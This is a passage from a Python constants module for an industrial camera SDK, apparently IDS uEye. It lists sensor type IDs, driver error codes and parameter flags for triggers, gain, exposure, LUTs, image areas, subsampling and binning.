IS_SENSOR_C3845R12C = 0x0041 # cmos, 3840x2760, rolling, 1/2.5", color, single board
IS_SENSOR_C0768R12M = 0x004A # cmos, 0768x0576, rolling, HDR sensor, 1/2", mono
IS_SENSOR_C0768R12C = 0x004B # cmos, 0768x0576, rolling, HDR sensor, 1/2", color
IS_SENSOR_C2057R12M_WO = 0x0044 # cmos, 2048x1536, rolling, 1/2", mono, USB board (special version WO)
IS_SENSOR_C2057R12C_WO = 0x0045 # cmos, 2048x1536, rolling, 1/2", color, USB board (special version WO)
IS_SENSOR_C2597R12M = 0x0048 # cmos, 2592x1944, rolling, 1/2", mono, USB board (special version WO)
IS_SENSOR_C2597R12C = 0x0049 # cmos, 2592x1944, rolling, 1/2", color, WO board (special version WO)
IS_SENSOR_C1280G12M = 0x0050 # cmos, 1280x1024, global, 1/2", mono
IS_SENSOR_C1280G12C = 0x0051 # cmos, 1280x1024, global, 1/2", color
# CCD sensors
IS_SENSOR_D1024G13M = 0x0080 # ccd, 1024x0768, global, 1/3", mono,
IS_SENSOR_D1024G13C = 0x0081 # ccd, 1024x0768, global, 1/3", color,
IS_SENSOR_D0640G13M = 0x0082 # ccd, 0640x0480, global, 1/3", mono
IS_SENSOR_D0640G13C = 0x0083 # ccd, 0640x0480, global, 1/3", color
IS_SENSOR_D1281G12M = 0x0084 # ccd, 1280x1024, global, 1/2", mono
IS_SENSOR_D1281G12C = 0x0085 # ccd, 1280x1024, global, 1/2", color
IS_SENSOR_D0640G12M = 0x0088 # ccd, 0640x0480, global, 1/2", mono,
IS_SENSOR_D0640G12C = 0x0089 # ccd, 0640x0480, global, 1/2", color,
IS_SENSOR_D0640G14M = 0x0090 # ccd, 0640x0480, global, 1/4", mono,
IS_SENSOR_D0640G14C = 0x0091 # ccd, 0640x0480, global, 1/4", color,
IS_SENSOR_D0768G12M = 0x0092 # ccd, 0768x0582, global, 1/2", mono,
IS_SENSOR_D0768G12C = 0x0093 # ccd, 0768x0582, global, 1/2", color,
IS_SENSOR_D1280G12M = 0x0096 # ccd, 1280x1024, global, 1/2", mono,
IS_SENSOR_D1280G12C = 0x0097 # ccd, 1280x1024, global, 1/2", color,
IS_SENSOR_D1600G12M = 0x0098 # ccd, 1600x1200, global, 1/1.8", mono,
IS_SENSOR_D1600G12C = 0x0099 # ccd, 1600x1200, global, 1/1.8", color,
IS_SENSOR_D1280G13M = 0x009A # ccd, 1280x960, global, 1/3", mono,
IS_SENSOR_D1280G13C = 0x009B # ccd, 1280x960, global, 1/3", color,
# ----------------------------------------------------------------------------
# error codes
# ----------------------------------------------------------------------------
IS_NO_SUCCESS = -1 # function call failed
IS_SUCCESS = 0 # function call succeeded
IS_INVALID_CAMERA_HANDLE = 1 # camera handle is not valid or zero
IS_INVALID_HANDLE = 1 # a handle other than the camera handle is invalid
IS_IO_REQUEST_FAILED = 2 # an io request to the driver failed
IS_CANT_OPEN_DEVICE = 3 # returned by is_InitCamera
IS_CANT_CLOSE_DEVICE = 4
IS_CANT_SETUP_MEMORY = 5
IS_NO_HWND_FOR_ERROR_REPORT = 6
IS_ERROR_MESSAGE_NOT_CREATED = 7
IS_ERROR_STRING_NOT_FOUND = 8
IS_HOOK_NOT_CREATED = 9
IS_TIMER_NOT_CREATED = 10
IS_CANT_OPEN_REGISTRY = 11
IS_CANT_READ_REGISTRY = 12
IS_CANT_VALIDATE_BOARD = 13
IS_CANT_GIVE_BOARD_ACCESS = 14
IS_NO_IMAGE_MEM_ALLOCATED = 15
IS_CANT_CLEANUP_MEMORY = 16
IS_CANT_COMMUNICATE_WITH_DRIVER = 17
IS_FUNCTION_NOT_SUPPORTED_YET = 18
IS_OPERATING_SYSTEM_NOT_SUPPORTED = 19
IS_INVALID_VIDEO_IN = 20
IS_INVALID_IMG_SIZE = 21
IS_INVALID_ADDRESS = 22
IS_INVALID_VIDEO_MODE = 23
IS_INVALID_AGC_MODE = 24
IS_INVALID_GAMMA_MODE = 25
IS_INVALID_SYNC_LEVEL = 26
IS_INVALID_CBARS_MODE = 27
IS_INVALID_COLOR_MODE = 28
IS_INVALID_SCALE_FACTOR = 29
IS_INVALID_IMAGE_SIZE = 30
IS_INVALID_IMAGE_POS = 31
IS_INVALID_CAPTURE_MODE = 32
IS_INVALID_RISC_PROGRAM = 33
IS_INVALID_BRIGHTNESS = 34
IS_INVALID_CONTRAST = 35
IS_INVALID_SATURATION_U = 36
IS_INVALID_SATURATION_V = 37
IS_INVALID_HUE = 38
IS_INVALID_HOR_FILTER_STEP = 39
IS_INVALID_VERT_FILTER_STEP = 40
IS_INVALID_EEPROM_READ_ADDRESS = 41
IS_INVALID_EEPROM_WRITE_ADDRESS = 42
IS_INVALID_EEPROM_READ_LENGTH = 43
IS_INVALID_EEPROM_WRITE_LENGTH = 44
IS_INVALID_BOARD_INFO_POINTER = 45
IS_INVALID_DISPLAY_MODE = 46
IS_INVALID_ERR_REP_MODE = 47
IS_INVALID_BITS_PIXEL = 48
IS_INVALID_MEMORY_POINTER = 49
IS_FILE_WRITE_OPEN_ERROR = 50
IS_FILE_READ_OPEN_ERROR = 51
IS_FILE_READ_INVALID_BMP_ID = 52
IS_FILE_READ_INVALID_BMP_SIZE = 53
IS_FILE_READ_INVALID_BIT_COUNT = 54
IS_WRONG_KERNEL_VERSION = 55
IS_RISC_INVALID_XLENGTH = 60
IS_RISC_INVALID_YLENGTH = 61
IS_RISC_EXCEED_IMG_SIZE = 62
# DirectDraw Mode errors
IS_DD_MAIN_FAILED = 70
IS_DD_PRIMSURFACE_FAILED = 71
IS_DD_SCRN_SIZE_NOT_SUPPORTED = 72
IS_DD_CLIPPER_FAILED = 73
IS_DD_CLIPPER_HWND_FAILED = 74
IS_DD_CLIPPER_CONNECT_FAILED = 75
IS_DD_BACKSURFACE_FAILED = 76
IS_DD_BACKSURFACE_IN_SYSMEM = 77
IS_DD_MDL_MALLOC_ERR = 78
IS_DD_MDL_SIZE_ERR = 79
IS_DD_CLIP_NO_CHANGE = 80
IS_DD_PRIMMEM_NULL = 81
IS_DD_BACKMEM_NULL = 82
IS_DD_BACKOVLMEM_NULL = 83
IS_DD_OVERLAYSURFACE_FAILED = 84
IS_DD_OVERLAYSURFACE_IN_SYSMEM = 85
IS_DD_OVERLAY_NOT_ALLOWED = 86
IS_DD_OVERLAY_COLKEY_ERR = 87
IS_DD_OVERLAY_NOT_ENABLED = 88
IS_DD_GET_DC_ERROR = 89
IS_DD_DDRAW_DLL_NOT_LOADED = 90
IS_DD_THREAD_NOT_CREATED = 91
IS_DD_CANT_GET_CAPS = 92
IS_DD_NO_OVERLAYSURFACE = 93
IS_DD_NO_OVERLAYSTRETCH = 94
IS_DD_CANT_CREATE_OVERLAYSURFACE = 95
IS_DD_CANT_UPDATE_OVERLAYSURFACE = 96
IS_DD_INVALID_STRETCH = 97
IS_EV_INVALID_EVENT_NUMBER = 100
IS_INVALID_MODE = 101
IS_CANT_FIND_FALCHOOK = 102
IS_CANT_FIND_HOOK = 102
IS_CANT_GET_HOOK_PROC_ADDR = 103
IS_CANT_CHAIN_HOOK_PROC = 104
IS_CANT_SETUP_WND_PROC = 105
IS_HWND_NULL = 106
IS_INVALID_UPDATE_MODE = 107
IS_NO_ACTIVE_IMG_MEM = 108
IS_CANT_INIT_EVENT = 109
IS_FUNC_NOT_AVAIL_IN_OS = 110
IS_CAMERA_NOT_CONNECTED = 111
IS_SEQUENCE_LIST_EMPTY = 112
IS_CANT_ADD_TO_SEQUENCE = 113
IS_LOW_OF_SEQUENCE_RISC_MEM = 114
IS_IMGMEM2FREE_USED_IN_SEQ = 115
IS_IMGMEM_NOT_IN_SEQUENCE_LIST= 116
IS_SEQUENCE_BUF_ALREADY_LOCKED= 117
IS_INVALID_DEVICE_ID = 118
IS_INVALID_BOARD_ID = 119
IS_ALL_DEVICES_BUSY = 120
IS_HOOK_BUSY = 121
IS_TIMED_OUT = 122
IS_NULL_POINTER = 123
IS_WRONG_HOOK_VERSION = 124
IS_INVALID_PARAMETER = 125 # a parameter specified was invalid
IS_NOT_ALLOWED = 126
IS_OUT_OF_MEMORY = 127
IS_INVALID_WHILE_LIVE = 128
IS_ACCESS_VIOLATION = 129 # an internal exception occurred
IS_UNKNOWN_ROP_EFFECT = 130
IS_INVALID_RENDER_MODE = 131
IS_INVALID_THREAD_CONTEXT = 132
IS_NO_HARDWARE_INSTALLED = 133
IS_INVALID_WATCHDOG_TIME = 134
IS_INVALID_WATCHDOG_MODE = 135
IS_INVALID_PASSTHROUGH_IN = 136
IS_ERROR_SETTING_PASSTHROUGH_IN = 137
IS_FAILURE_ON_SETTING_WATCHDOG = 138
IS_NO_USB20 = 139 # the usb port doesnt support usb 2.0
IS_CAPTURE_RUNNING = 140 # there is already a capture running
IS_MEMORY_BOARD_ACTIVATED = 141 # operation could not execute while mboard is enabled
IS_MEMORY_BOARD_DEACTIVATED = 142 # operation could not execute while mboard is disabled
IS_NO_MEMORY_BOARD_CONNECTED = 143 # no memory board connected
IS_TOO_LESS_MEMORY = 144 # image size is above memory capacity
IS_IMAGE_NOT_PRESENT = 145 # requested image is no longer present in the camera
IS_MEMORY_MODE_RUNNING = 146
IS_MEMORYBOARD_DISABLED = 147
IS_TRIGGER_ACTIVATED = 148 # operation could not execute while trigger is enabled
IS_WRONG_KEY = 150
IS_CRC_ERROR = 151
IS_NOT_YET_RELEASED = 152 # this feature is not available yet
IS_NOT_CALIBRATED = 153 # the camera is not calibrated
IS_WAITING_FOR_KERNEL = 154 # a request to the kernel exceeded
IS_NOT_SUPPORTED = 155 # operation mode is not supported
IS_TRIGGER_NOT_ACTIVATED = 156 # operation could not execute while trigger is disabled
IS_OPERATION_ABORTED = 157
IS_BAD_STRUCTURE_SIZE = 158
IS_INVALID_BUFFER_SIZE = 159
IS_INVALID_PIXEL_CLOCK = 160
IS_INVALID_EXPOSURE_TIME = 161
IS_AUTO_EXPOSURE_RUNNING = 162
IS_CANNOT_CREATE_BB_SURF = 163 # error creating backbuffer surface
IS_CANNOT_CREATE_BB_MIX = 164 # backbuffer mixer surfaces can not be created
IS_BB_OVLMEM_NULL = 165 # backbuffer overlay mem could not be locked
IS_CANNOT_CREATE_BB_OVL = 166 # backbuffer overlay mem could not be created
IS_NOT_SUPP_IN_OVL_SURF_MODE = 167 # function not supported in overlay surface mode
IS_INVALID_SURFACE = 168 # surface invalid
IS_SURFACE_LOST = 169 # surface has been lost
IS_RELEASE_BB_OVL_DC = 170 # error releasing backbuffer overlay DC
IS_BB_TIMER_NOT_CREATED = 171 # backbuffer timer could not be created
IS_BB_OVL_NOT_EN = 172 # backbuffer overlay has not been enabled
IS_ONLY_IN_BB_MODE = 173 # only possible in backbuffer mode
IS_INVALID_COLOR_FORMAT = 174 # invalid color format
IS_INVALID_WB_BINNING_MODE = 175 # invalid binning mode for AWB
IS_INVALID_I2C_DEVICE_ADDRESS = 176 # invalid I2C device address
IS_COULD_NOT_CONVERT = 177 # current image couldn't be converted
IS_TRANSFER_ERROR = 178 # transfer failed
IS_PARAMETER_SET_NOT_PRESENT = 179 # the parameter set is not present
IS_INVALID_CAMERA_TYPE = 180 # the camera type in the ini file doesn't match
IS_INVALID_HOST_IP_HIBYTE = 181 # HIBYTE of host address is invalid
IS_CM_NOT_SUPP_IN_CURR_DISPLAYMODE = 182 # color mode is not supported in the current display mode
IS_NO_IR_FILTER = 183
IS_STARTER_FW_UPLOAD_NEEDED = 184 # device starter firmware is not compatible
IS_DR_LIBRARY_NOT_FOUND = 185 # the DirectRender library could not be found
IS_DR_DEVICE_OUT_OF_MEMORY = 186 # insufficient graphics adapter video memory
IS_DR_CANNOT_CREATE_SURFACE = 187 # the image or overlay surface could not be created
IS_DR_CANNOT_CREATE_VERTEX_BUFFER = 188 # the vertex buffer could not be created
IS_DR_CANNOT_CREATE_TEXTURE = 189 # the texture could not be created
IS_DR_CANNOT_LOCK_OVERLAY_SURFACE = 190 # the overlay surface could not be locked
IS_DR_CANNOT_UNLOCK_OVERLAY_SURFACE = 191 # the overlay surface could not be unlocked
IS_DR_CANNOT_GET_OVERLAY_DC = 192 # cannot get the overlay surface DC
IS_DR_CANNOT_RELEASE_OVERLAY_DC = 193 # cannot release the overlay surface DC
IS_DR_DEVICE_CAPS_INSUFFICIENT = 194 # insufficient graphics adapter capabilities
IS_INCOMPATIBLE_SETTING = 195 # Operation is not possible because of another incompatible setting
IS_DR_NOT_ALLOWED_WHILE_DC_IS_ACTIVE = 196 # user App still has DC handle.
IS_DEVICE_ALREADY_PAIRED = 197 # The device is already paired
IS_SUBNETMASK_MISMATCH = 198 # The subnetmasks of the device and the adapter differ
IS_SUBNET_MISMATCH = 199 # The subnets of the device and the adapter differ
IS_INVALID_IP_CONFIGURATION = 200 # The IP configuration of the device is invalid
IS_DEVICE_NOT_COMPATIBLE = 201 # The device is incompatible to the driver
IS_NETWORK_FRAME_SIZE_INCOMPATIBLE = 202 # The frame size settings of the device and the network adapter are incompatible
IS_NETWORK_CONFIGURATION_INVALID = 203 # The network adapter configuration is invalid
IS_ERROR_CPU_IDLE_STATES_CONFIGURATION = 204 # The setting of the CPU idle state configuration failed
IS_DEVICE_BUSY = 205 # The device is busy. The operation must be executed again later.
# ----------------------------------------------------------------------------
# common definitions
# ----------------------------------------------------------------------------
IS_OFF = 0
IS_ON = 1
IS_IGNORE_PARAMETER = -1
# ----------------------------------------------------------------------------
# device enumeration
# ----------------------------------------------------------------------------
IS_USE_DEVICE_ID = 0x8000
IS_ALLOW_STARTER_FW_UPLOAD = 0x10000
# ----------------------------------------------------------------------------
# AutoExit enable/disable
# ----------------------------------------------------------------------------
IS_GET_AUTO_EXIT_ENABLED = 0x8000
IS_DISABLE_AUTO_EXIT = 0
IS_ENABLE_AUTO_EXIT = 1
# ----------------------------------------------------------------------------
# live/freeze parameters
# ----------------------------------------------------------------------------
IS_GET_LIVE = 0x8000
IS_WAIT = 0x0001
IS_DONT_WAIT = 0x0000
IS_FORCE_VIDEO_STOP = 0x4000
IS_FORCE_VIDEO_START = 0x4000
IS_USE_NEXT_MEM = 0x8000
# ----------------------------------------------------------------------------
# video finish constants
# ----------------------------------------------------------------------------
IS_VIDEO_NOT_FINISH = 0
IS_VIDEO_FINISH = 1
# ----------------------------------------------------------------------------
# bitmap render modes
# ----------------------------------------------------------------------------
IS_GET_RENDER_MODE = 0x8000
IS_RENDER_DISABLED = 0x0000
IS_RENDER_NORMAL = 0x0001
IS_RENDER_FIT_TO_WINDOW = 0x0002
IS_RENDER_DOWNSCALE_1_2 = 0x0004
IS_RENDER_MIRROR_UPDOWN = 0x0010
IS_RENDER_DOUBLE_HEIGHT = 0x0020
IS_RENDER_HALF_HEIGHT = 0x0040
IS_RENDER_PLANAR_COLOR_RED = 0x0080
IS_RENDER_PLANAR_COLOR_GREEN = 0x0100
IS_RENDER_PLANAR_COLOR_BLUE = 0x0200
IS_RENDER_PLANAR_MONO_RED = 0x0400
IS_RENDER_PLANAR_MONO_GREEN = 0x0800
IS_RENDER_PLANAR_MONO_BLUE = 0x1000
IS_USE_AS_DC_STRUCTURE = 0x4000
IS_USE_AS_DC_HANDLE = 0x8000
# ----------------------------------------------------------------------------
# external trigger modes
# ----------------------------------------------------------------------------
IS_GET_EXTERNALTRIGGER = 0x8000
IS_GET_TRIGGER_STATUS = 0x8001
IS_GET_TRIGGER_MASK = 0x8002
IS_GET_TRIGGER_INPUTS = 0x8003
IS_GET_SUPPORTED_TRIGGER_MODE = 0x8004
IS_GET_TRIGGER_COUNTER = 0x8000
# old defines for compatibility
IS_SET_TRIG_OFF = 0x0000
IS_SET_TRIG_HI_LO = 0x0001
IS_SET_TRIG_LO_HI = 0x0002
IS_SET_TRIG_SOFTWARE = 0x0008
IS_SET_TRIG_HI_LO_SYNC = 0x0010
IS_SET_TRIG_LO_HI_SYNC = 0x0020
IS_SET_TRIG_MASK = 0x0100
# New defines
IS_SET_TRIGGER_CONTINUOUS = 0x1000
IS_SET_TRIGGER_OFF = IS_SET_TRIG_OFF
IS_SET_TRIGGER_HI_LO = (IS_SET_TRIGGER_CONTINUOUS | IS_SET_TRIG_HI_LO)
IS_SET_TRIGGER_LO_HI = (IS_SET_TRIGGER_CONTINUOUS | IS_SET_TRIG_LO_HI)
IS_SET_TRIGGER_SOFTWARE = (IS_SET_TRIGGER_CONTINUOUS | IS_SET_TRIG_SOFTWARE)
IS_SET_TRIGGER_HI_LO_SYNC = IS_SET_TRIG_HI_LO_SYNC
IS_SET_TRIGGER_LO_HI_SYNC = IS_SET_TRIG_LO_HI_SYNC
IS_SET_TRIGGER_PRE_HI_LO = (IS_SET_TRIGGER_CONTINUOUS | 0x0040)
IS_SET_TRIGGER_PRE_LO_HI = (IS_SET_TRIGGER_CONTINUOUS | 0x0080)
IS_GET_TRIGGER_DELAY = 0x8000
IS_GET_MIN_TRIGGER_DELAY = 0x8001
IS_GET_MAX_TRIGGER_DELAY = 0x8002
IS_GET_TRIGGER_DELAY_GRANULARITY = 0x8003
# ----------------------------------------------------------------------------
# Timing
# ----------------------------------------------------------------------------
# pixelclock
IS_GET_PIXEL_CLOCK = 0x8000
IS_GET_DEFAULT_PIXEL_CLK = 0x8001
IS_GET_PIXEL_CLOCK_INC = 0x8005
# frame rate
IS_GET_FRAMERATE = 0x8000
IS_GET_DEFAULT_FRAMERATE = 0x8001
# exposure
IS_GET_EXPOSURE_TIME = 0x8000
IS_GET_DEFAULT_EXPOSURE = 0x8001
IS_GET_EXPOSURE_MIN_VALUE = 0x8002
IS_GET_EXPOSURE_MAX_VALUE = 0x8003
IS_GET_EXPOSURE_INCREMENT = 0x8004
IS_GET_EXPOSURE_FINE_INCREMENT = 0x8005
# ----------------------------------------------------------------------------
# Gain definitions
# ----------------------------------------------------------------------------
IS_GET_MASTER_GAIN = 0x8000
IS_GET_RED_GAIN = 0x8001
IS_GET_GREEN_GAIN = 0x8002
IS_GET_BLUE_GAIN = 0x8003
IS_GET_DEFAULT_MASTER = 0x8004
IS_GET_DEFAULT_RED = 0x8005
IS_GET_DEFAULT_GREEN = 0x8006
IS_GET_DEFAULT_BLUE = 0x8007
IS_GET_GAINBOOST = 0x8008
IS_SET_GAINBOOST_ON = 0x0001
IS_SET_GAINBOOST_OFF = 0x0000
IS_GET_SUPPORTED_GAINBOOST = 0x0002
IS_MIN_GAIN = 0
IS_MAX_GAIN = 100
# ----------------------------------------------------------------------------
# Gain factor definitions
# ----------------------------------------------------------------------------
IS_GET_MASTER_GAIN_FACTOR = 0x8000
IS_GET_RED_GAIN_FACTOR = 0x8001
IS_GET_GREEN_GAIN_FACTOR = 0x8002
IS_GET_BLUE_GAIN_FACTOR = 0x8003
IS_SET_MASTER_GAIN_FACTOR = 0x8004
IS_SET_RED_GAIN_FACTOR = 0x8005
IS_SET_GREEN_GAIN_FACTOR = 0x8006
IS_SET_BLUE_GAIN_FACTOR = 0x8007
IS_GET_DEFAULT_MASTER_GAIN_FACTOR = 0x8008
IS_GET_DEFAULT_RED_GAIN_FACTOR = 0x8009
IS_GET_DEFAULT_GREEN_GAIN_FACTOR = 0x800a
IS_GET_DEFAULT_BLUE_GAIN_FACTOR = 0x800b
IS_INQUIRE_MASTER_GAIN_FACTOR = 0x800c
IS_INQUIRE_RED_GAIN_FACTOR = 0x800d
IS_INQUIRE_GREEN_GAIN_FACTOR = 0x800e
IS_INQUIRE_BLUE_GAIN_FACTOR = 0x800f
# ----------------------------------------------------------------------------
# Global Shutter definitions
# ----------------------------------------------------------------------------
IS_SET_GLOBAL_SHUTTER_ON = 0x0001
IS_SET_GLOBAL_SHUTTER_OFF = 0x0000
IS_GET_GLOBAL_SHUTTER = 0x0010
IS_GET_SUPPORTED_GLOBAL_SHUTTER = 0x0020
# ----------------------------------------------------------------------------
# Black level definitions
# ----------------------------------------------------------------------------
IS_GET_BL_COMPENSATION = 0x8000
IS_GET_BL_OFFSET = 0x8001
IS_GET_BL_DEFAULT_MODE = 0x8002
IS_GET_BL_DEFAULT_OFFSET = 0x8003
IS_GET_BL_SUPPORTED_MODE = 0x8004
IS_BL_COMPENSATION_DISABLE = 0
IS_BL_COMPENSATION_ENABLE = 1
IS_BL_COMPENSATION_OFFSET = 32
IS_MIN_BL_OFFSET = 0
IS_MAX_BL_OFFSET = 255
# ----------------------------------------------------------------------------
# hardware gamma definitions
# ----------------------------------------------------------------------------
IS_GET_HW_GAMMA = 0x8000
IS_GET_HW_SUPPORTED_GAMMA = 0x8001
IS_SET_HW_GAMMA_OFF = 0x0000
IS_SET_HW_GAMMA_ON = 0x0001
# ----------------------------------------------------------------------------
# camera LUT
# ----------------------------------------------------------------------------
IS_ENABLE_CAMERA_LUT = 0x0001
IS_SET_CAMERA_LUT_VALUES = 0x0002
IS_ENABLE_RGB_GRAYSCALE = 0x0004
IS_GET_CAMERA_LUT_USER = 0x0008
IS_GET_CAMERA_LUT_COMPLETE = 0x0010
IS_GET_CAMERA_LUT_SUPPORTED_CHANNELS = 0x0020
# ----------------------------------------------------------------------------
# camera LUT presets
# ----------------------------------------------------------------------------
IS_CAMERA_LUT_IDENTITY = 0x00000100
IS_CAMERA_LUT_NEGATIV = 0x00000200
IS_CAMERA_LUT_GLOW1 = 0x00000400
IS_CAMERA_LUT_GLOW2 = 0x00000800
IS_CAMERA_LUT_ASTRO1 = 0x00001000
IS_CAMERA_LUT_RAINBOW1 = 0x00002000
IS_CAMERA_LUT_MAP1 = 0x00004000
IS_CAMERA_LUT_COLD_HOT = 0x00008000
IS_CAMERA_LUT_SEPIC = 0x00010000
IS_CAMERA_LUT_ONLY_RED = 0x00020000
IS_CAMERA_LUT_ONLY_GREEN = 0x00040000
IS_CAMERA_LUT_ONLY_BLUE = 0x00080000
IS_CAMERA_LUT_64 = 64
IS_CAMERA_LUT_128 = 128
# ----------------------------------------------------------------------------
# image parameters
# ----------------------------------------------------------------------------
# brightness
IS_GET_BRIGHTNESS = 0x8000
IS_MIN_BRIGHTNESS = 0
IS_MAX_BRIGHTNESS = 255
IS_DEFAULT_BRIGHTNESS = -1
# contrast
IS_GET_CONTRAST = 0x8000
IS_MIN_CONTRAST = 0
IS_MAX_CONTRAST = 511
IS_DEFAULT_CONTRAST = -1
# gamma
IS_GET_GAMMA = 0x8000
IS_MIN_GAMMA = 1
IS_MAX_GAMMA = 1000
IS_DEFAULT_GAMMA = -1
# saturation (Falcon)
IS_GET_SATURATION_U = 0x8000
IS_MIN_SATURATION_U = 0
IS_MAX_SATURATION_U = 200
IS_DEFAULT_SATURATION_U = 100
IS_GET_SATURATION_V = 0x8001
IS_MIN_SATURATION_V = 0
IS_MAX_SATURATION_V = 200
IS_DEFAULT_SATURATION_V = 100
# hue (Falcon)
IS_GET_HUE = 0x8000
IS_MIN_HUE = 0
IS_MAX_HUE = 255
IS_DEFAULT_HUE = 128
# ----------------------------------------------------------------------------
# Image position and size
# ----------------------------------------------------------------------------
# deprecated defines
IS_GET_IMAGE_SIZE_X = 0x8000
IS_GET_IMAGE_SIZE_Y = 0x8001
IS_GET_IMAGE_SIZE_X_INC = 0x8002
IS_GET_IMAGE_SIZE_Y_INC = 0x8003
IS_GET_IMAGE_SIZE_X_MIN = 0x8004
IS_GET_IMAGE_SIZE_Y_MIN = 0x8005
IS_GET_IMAGE_SIZE_X_MAX = 0x8006
IS_GET_IMAGE_SIZE_Y_MAX = 0x8007
IS_GET_IMAGE_POS_X = 0x8001
IS_GET_IMAGE_POS_Y = 0x8002
IS_GET_IMAGE_POS_X_ABS = 0xC001
IS_GET_IMAGE_POS_Y_ABS = 0xC002
IS_GET_IMAGE_POS_X_INC = 0xC003
IS_GET_IMAGE_POS_Y_INC = 0xC004
IS_GET_IMAGE_POS_X_MIN = 0xC005
IS_GET_IMAGE_POS_Y_MIN = 0xC006
IS_GET_IMAGE_POS_X_MAX = 0xC007
IS_GET_IMAGE_POS_Y_MAX = 0xC008
IS_SET_IMAGE_POS_X_ABS = 0x00010000
IS_SET_IMAGE_POS_Y_ABS = 0x00010000
IS_SET_IMAGEPOS_X_ABS = 0x8000
IS_SET_IMAGEPOS_Y_ABS = 0x8000
# Valid defines
# Image
IS_AOI_IMAGE_SET_AOI = 0x0001
IS_AOI_IMAGE_GET_AOI = 0x0002
IS_AOI_IMAGE_SET_POS = 0x0003
IS_AOI_IMAGE_GET_POS = 0x0004
IS_AOI_IMAGE_SET_SIZE = 0x0005
IS_AOI_IMAGE_GET_SIZE = 0x0006
IS_AOI_IMAGE_GET_POS_MIN = 0x0007
IS_AOI_IMAGE_GET_SIZE_MIN = 0x0008
IS_AOI_IMAGE_GET_POS_MAX = 0x0009
IS_AOI_IMAGE_GET_SIZE_MAX = 0x0010
IS_AOI_IMAGE_GET_POS_INC = 0x0011
IS_AOI_IMAGE_GET_SIZE_INC = 0x0012
IS_AOI_IMAGE_GET_POS_X_ABS = 0x0013
IS_AOI_IMAGE_GET_POS_Y_ABS = 0x0014
IS_AOI_IMAGE_GET_ORIGINAL_AOI = 0x0015
IS_AOI_IMAGE_POS_ABSOLUTE = 0x10000000
# Fast move
IS_AOI_IMAGE_SET_POS_FAST = 0x0020
IS_AOI_IMAGE_SET_POS_FAST_SUPPORTED = 0x0021
# Auto features
IS_AOI_AUTO_BRIGHTNESS_SET_AOI = 0x0030
IS_AOI_AUTO_BRIGHTNESS_GET_AOI = 0x0031
IS_AOI_AUTO_WHITEBALANCE_SET_AOI = 0x0032
IS_AOI_AUTO_WHITEBALANCE_GET_AOI = 0x0033
# Multi AOI
IS_AOI_MULTI_GET_SUPPORTED_MODES = 0x0100
IS_AOI_MULTI_SET_AOI = 0x0200
IS_AOI_MULTI_GET_AOI = 0x0400
IS_AOI_MULTI_DISABLE_AOI = 0x0800
IS_AOI_MULTI_MODE_AXES = 0x0001
IS_AOI_MULTI_MODE_X_Y_AXES = 0x0001
IS_AOI_MULTI_MODE_Y_AXES = 0x0002
# AOI sequence
IS_AOI_SEQUENCE_GET_SUPPORTED = 0x0050
IS_AOI_SEQUENCE_SET_PARAMS = 0x0051
IS_AOI_SEQUENCE_GET_PARAMS = 0x0052
IS_AOI_SEQUENCE_SET_ENABLE = 0x0053
IS_AOI_SEQUENCE_GET_ENABLE = 0x0054
IS_AOI_SEQUENCE_INDEX_AOI_1 = 0
IS_AOI_SEQUENCE_INDEX_AOI_2 = 1
IS_AOI_SEQUENCE_INDEX_AOI_3 = 2
IS_AOI_SEQUENCE_INDEX_AOI_4 = 4
# ----------------------------------------------------------------------------
# ROP effect constants
# ----------------------------------------------------------------------------
# Raster-operation (mirror) effect selectors and flags.
IS_GET_ROP_EFFECT = 0x8000
IS_GET_SUPPORTED_ROP_EFFECT = 0x8001
IS_SET_ROP_NONE = 0
IS_SET_ROP_MIRROR_UPDOWN = 8
IS_SET_ROP_MIRROR_UPDOWN_ODD = 16
IS_SET_ROP_MIRROR_UPDOWN_EVEN = 32
IS_SET_ROP_MIRROR_LEFTRIGHT = 64
# ----------------------------------------------------------------------------
# Subsampling
# ----------------------------------------------------------------------------
IS_GET_SUBSAMPLING = 0x8000
IS_GET_SUPPORTED_SUBSAMPLING = 0x8001
IS_GET_SUBSAMPLING_TYPE = 0x8002
IS_GET_SUBSAMPLING_FACTOR_HORIZONTAL = 0x8004
IS_GET_SUBSAMPLING_FACTOR_VERTICAL = 0x8008
# Individual subsampling factors are single-bit flags so they can be OR-ed
# and collected into the MASK_* values below.
IS_SUBSAMPLING_DISABLE = 0x00
IS_SUBSAMPLING_2X_VERTICAL = 0x0001
IS_SUBSAMPLING_2X_HORIZONTAL = 0x0002
IS_SUBSAMPLING_4X_VERTICAL = 0x0004
IS_SUBSAMPLING_4X_HORIZONTAL = 0x0008
IS_SUBSAMPLING_3X_VERTICAL = 0x0010
IS_SUBSAMPLING_3X_HORIZONTAL = 0x0020
IS_SUBSAMPLING_5X_VERTICAL = 0x0040
IS_SUBSAMPLING_5X_HORIZONTAL = 0x0080
IS_SUBSAMPLING_6X_VERTICAL = 0x0100
IS_SUBSAMPLING_6X_HORIZONTAL = 0x0200
IS_SUBSAMPLING_8X_VERTICAL = 0x0400
IS_SUBSAMPLING_8X_HORIZONTAL = 0x0800
IS_SUBSAMPLING_16X_VERTICAL = 0x1000
IS_SUBSAMPLING_16X_HORIZONTAL = 0x2000
IS_SUBSAMPLING_COLOR = 0x01
IS_SUBSAMPLING_MONO = 0x02
IS_SUBSAMPLING_MASK_VERTICAL = (IS_SUBSAMPLING_2X_VERTICAL | IS_SUBSAMPLING_4X_VERTICAL | IS_SUBSAMPLING_3X_VERTICAL | IS_SUBSAMPLING_5X_VERTICAL | IS_SUBSAMPLING_6X_VERTICAL | IS_SUBSAMPLING_8X_VERTICAL | IS_SUBSAMPLING_16X_VERTICAL)
IS_SUBSAMPLING_MASK_HORIZONTAL = (IS_SUBSAMPLING_2X_HORIZONTAL | IS_SUBSAMPLING_4X_HORIZONTAL | IS_SUBSAMPLING_3X_HORIZONTAL | IS_SUBSAMPLING_5X_HORIZONTAL | IS_SUBSAMPLING_6X_HORIZONTAL | IS_SUBSAMPLING_8X_HORIZONTAL | IS_SUBSAMPLING_16X_HORIZONTAL)
# Compatibility
IS_SUBSAMPLING_VERT = IS_SUBSAMPLING_2X_VERTICAL
IS_SUBSAMPLING_HOR = IS_SUBSAMPLING_2X_HORIZONTAL
# ----------------------------------------------------------------------------
# Binning
# ----------------------------------------------------------------------------
# Binning flags use the same bit layout as the subsampling flags above.
IS_GET_BINNING = 0x8000
IS_GET_SUPPORTED_BINNING = 0x8001
IS_GET_BINNING_TYPE = 0x8002
IS_GET_BINNING_FACTOR_HORIZONTAL= 0x8004
IS_GET_BINNING_FACTOR_VERTICAL = 0x8008
IS_BINNING_DISABLE = 0x00
